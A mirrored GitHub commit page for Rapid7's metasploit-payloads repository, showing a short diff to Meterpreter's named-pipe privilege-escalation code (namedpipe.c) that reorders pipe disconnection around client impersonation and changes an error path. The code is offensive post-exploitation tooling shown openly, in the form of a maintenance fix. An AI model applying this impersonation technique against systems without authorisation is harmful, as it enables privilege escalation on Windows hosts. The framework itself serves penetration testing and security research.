github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-24 18:16:24 +01:00
Code Releases Activity

Land , Disconnect the named pipe and break after the impersonation callback

Browse Source 
Merge branch 'land-438' into upstream-master
This commit is contained in:
bwatters-r7 2020-10-07 14:51:36 -05:00
commit b1c8376459
No known key found for this signature in database
GPG Key ID: ECC0F0A52E65F268
1 changed files with 6 additions and 3 deletions

9
c/meterpreter/source/extensions/priv/namedpipe.c

@ -35,6 +35,7 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
char * cpPipeName = NULL; char * cpPipeName = NULL;
BYTE bMessage[128] = {0}; BYTE bMessage[128] = {0};
DWORD dwBytes = 0; DWORD dwBytes = 0;
BOOL bImpersonated = FALSE;
PPRIV_POST_IMPERSONATION pPostImpersonation = NULL; PPRIV_POST_IMPERSONATION pPostImpersonation = NULL;
do { do {
@ -85,11 +86,14 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
// we can't impersonate a client until we have performed a read on the pipe... // we can't impersonate a client until we have performed a read on the pipe...
if (!ReadFile(hPipe, &bMessage, 1, &dwBytes, NULL)) { if (!ReadFile(hPipe, &bMessage, 1, &dwBytes, NULL)) {
DisconnectNamedPipe(hPipe);
CONTINUE_ON_ERROR("[ELEVATE] pipethread. ReadFile failed"); CONTINUE_ON_ERROR("[ELEVATE] pipethread. ReadFile failed");
} }
// impersonate the client! // impersonate the client!
if (!ImpersonateNamedPipeClient(hPipe)) { bImpersonated = ImpersonateNamedPipeClient(hPipe);
DisconnectNamedPipe(hPipe);
if (!bImpersonated) {
CONTINUE_ON_ERROR("[ELEVATE] elevate_namedpipe_thread. ImpersonateNamedPipeClient failed"); CONTINUE_ON_ERROR("[ELEVATE] elevate_namedpipe_thread. ImpersonateNamedPipeClient failed");
} }
@ -98,7 +102,7 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
dwResult = pPostImpersonation->pCallback(pPostImpersonation->pCallbackParam); dwResult = pPostImpersonation->pCallback(pPostImpersonation->pCallbackParam);
if (dwResult != ERROR_SUCCESS) { if (dwResult != ERROR_SUCCESS) {
RevertToSelf(); RevertToSelf();
CONTINUE_ON_ERROR("[ELEVATE] elevate_namedpipe_thread. the post impersonation callback failed"); BREAK_ON_ERROR("[ELEVATE] elevate_namedpipe_thread. the post impersonation callback failed");
} }
} }
else { else {
@ -109,7 +113,6 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
} while (0); } while (0);
if (hPipe) { if (hPipe) {
DisconnectNamedPipe(hPipe);
CLOSE_HANDLE(hPipe); CLOSE_HANDLE(hPipe);
} }